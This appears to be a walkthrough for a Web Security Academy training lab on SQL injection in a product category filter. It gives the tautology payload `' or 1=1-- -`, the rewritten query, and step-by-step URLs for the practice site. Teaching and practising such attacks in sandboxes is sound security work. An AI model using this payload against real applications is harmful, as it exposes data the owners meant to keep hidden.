Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

This lab contains an SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

Solution: 

' or 1=1-- -
SELECT * FROM products WHERE category = '' or 1=1-- -' AND released = 1

Steps:

  1. Visit:https://YOUR-SESSION.web-security-academy.net/filter?category=Accessories

  2. Insert single quote [ ' ] :https://YOUR-SESSION.web-security-academy.net/filter?category=Accessories'

  3. You will gain an internal server error

  4. Try to inject tautology payload to retrieve released and unreleased products

  5. https://ac631f881eeeb165c0bf17e90011009b.web-security-academy.net/filter?category=Accessories' or 1=1-- -

PreviousSQL injectionNextLab: SQL injection vulnerability allowing login bypass

Last updated